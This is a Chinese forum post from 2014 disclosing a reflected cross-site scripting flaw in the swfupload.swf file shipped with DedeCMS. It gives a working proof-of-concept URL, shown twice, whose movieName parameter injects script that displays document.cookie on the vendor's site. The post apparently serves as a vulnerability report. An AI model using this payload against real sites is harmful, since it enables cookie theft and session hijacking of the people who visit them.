忘记密码?

一键登录

草根吧源码论坛

Dedecms flash反射性XSS跨站

查看: 610|回复: 0

Dedecms flash反射性XSS跨站

[复制链接]

5761

主题

1978

热度

731

贡献

管理员

Rank: 9Rank: 9Rank: 9

DZ专员

发表于 2014-9-28 10:13:37 | 显示全部楼层 |阅读模式 | 百度  360  谷歌 
分享到:
详细说明:

Location: /uploads/images/swfupload/swfupload.swf



漏洞文件为:http://www.dedecms.com/images/swfupload/swfupload.swf



这个flash文件存在漏洞,此文件漏洞可参考:https://nealpoole.com/blog/2012/ ... swfupload-plupload/



构造XSS攻击

http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

漏洞证明:

http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//



草根吧 Dedecms flash反射性XSS跨站 flash 站长头条 30102108281c76bde0c1acbb2238c24c49786015



帖子地址: 

本文来源于草根吧源码论坛 www.caogen8.co,欢迎大家下载。
如果您没有贡献需要充值,可以直接在线充值,点击充值
如果你需要加入本站赞助VIP会员,可以直接在线开通,点击开通
如果找不到您要的资源,请搜索一下,点击搜索
回复

举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册 新浪微博登陆 用百度帐号登录 一键登录:

本版积分规则

收藏帖子 返回列表 搜索
快速回复 返回顶部 返回列表